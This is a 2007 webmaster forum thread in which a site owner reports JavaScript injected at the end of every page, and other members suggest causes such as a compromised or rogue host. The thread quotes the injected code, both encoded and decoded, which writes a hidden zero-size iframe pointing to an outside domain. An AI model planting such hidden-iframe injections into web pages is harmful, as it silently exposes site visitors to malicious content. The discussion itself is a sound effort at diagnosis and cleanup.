Malicious Javascript On My Site

Forum Moderators: open

Message Too Old, No Replies

Malicious Javascript On My Site

Cant get rid of a java script on my site that tries to redirect it

SteveB123

2:15 pm on Jun 15, 2007 (gmt 0)

This is the javascript that is at the bottom of all of my pages

translated
It shows that the script is in fact:
document.write("<iframe src='http://v2.example.us/' width=0 height=0></
iframe><br>");

This script is not on any of the pages on my computer and all the pages on the server match the ones on my computer I have changed my ftp passwords and Im in the process of changing my hosting company to see if it is a problem with their security I just need it fixed because my rankings are dropping if someone could help that would be great.

[edited by: jatar_k at 2:36 pm (utc) on June 15, 2007]
[edit reason] examplified url [/edit]

jaytee

9:58 pm on Jun 15, 2007 (gmt 0)

Don't believe the domain resolves. Width and height of the iframe are of course 0. Looks more like debris from a template. Alternatively, are you using a 'hit counter'?

londrum

10:13 am on Jun 16, 2007 (gmt 0)

could you maybe try and comment it out?
i mean, if you can't stop it writing the code to the page everytime, then you could at least place
<!--

-->
around where it appears. then the script won't run.
obviously this is just a quick solution, and you would still need to get to the bottom of it.

are you sure it is something on your server. could it not be some kind of trojan on your own computer? i once had something infect my computer which redirected me to shopping sites. but a quick flush with spybot got rid of it.

SteveB123

12:58 pm on Jun 16, 2007 (gmt 0)

Responding to what londrum said the script is on the server i tried your idea about commenting it out but the script appears at the very end of my pages so  makes it start outside of the comment

could you maybe try and comment it out?
i mean, if you can't stop it writing the code to the page everytime, then you could at least place

taking that a step farther is there a way to write a script that says when it sees <script language = JScript.Encode>#@~^YAAAAA==@#@&NG1Es+xDRS.kD+cJ@!kW.m:+,dD1'B4OOw=zJ\+RUdZ Ek&B,hr[Dt'T~4+ro4O{!@*@!zb0Dm:@*@!(D@*J*i@#@&axsAAA==^#~@</script> to comment it out? or to ignore it?

londrum

5:41 pm on Jun 16, 2007 (gmt 0)

does it appear before the </body> tag, or after the </html> tag?
because if it looks for the </body> tag before writing itself, then you could try placing the closing comment AFTER the </html>. that would place the script and both the body and html tags inside the comment.

obviously your page wouldn't validate anymore. but it would still probably display okay. especially if you change the DOCTYPE to something less rigid.

but you've got to think how is it writing itself there in the first place.
have you got a .htaccess file with something strange in it? maybe they're hidden it so you can't see it. try turning on 'show hidden files', or something like that in whatever program you use to upload stuff.

Marcia

5:50 pm on Jun 16, 2007 (gmt 0)

Getting back to the hit counter question asked, is there one, or is there anything at all on the page that's being remotely called?

Marcia

7:00 pm on Jun 16, 2007 (gmt 0)

>>>but you've got to think how is it writing itself there in the first place.

I've seen just this type of thing discussed, including a redirection being done. The person who had the problem was told to ask the host what was being inserted and why.

It's not at all impossible. A couple of years ago there was a hosting company that was using cloaking to add stuff to their customers' sites, hidden links if I remember right. That was for sure, not a guess and it was a lot of sites affected. Google didn't touch the client sites, but they did nail the host for it.

Aside from that possibility, which can't be 100% discounted, check and see what's happening if there are any remote calls to other sites from the page, either scripts or images.

SteveB123

12:49 am on Jun 17, 2007 (gmt 0)

It appears at the very end whatever the last character is in the code on each page, in most cases it is after the /html there is no hit counter that i am aware of but the hosting company does keep stats but they changed their stats and their stats server does not work anymore and since around that time is the time i started having trouble with my sites is that a coincidence?

encyclo

1:48 am on Jun 17, 2007 (gmt 0)

There is very little you can do on the page to stop the problem. The server your site is hosted on is appending the Javascript on the end of every page via an internal rewrite or similar.

Your best course of action is to move to a different hosting company - as it is your current hosting company who either placed the code there (and are unwilling to remove it), or their server has been compromised (and they are unable to fix the problem). Either reason is an extremely good reason for getting out.

londrum

1:59 pm on Jun 17, 2007 (gmt 0)

...the hosting company does keep stats but they changed their stats and their stats server does not work anymore and since around that time is the time i started having trouble with my sites is that a coincidence?

i agree with the last guy, i think you should just cut your losses and find a new hosting company. the one that you're using now doesn't sound too great.
you might have a week of hassle changing it all over, but it will be worth it in the end. especially if you take your time looking for a good one.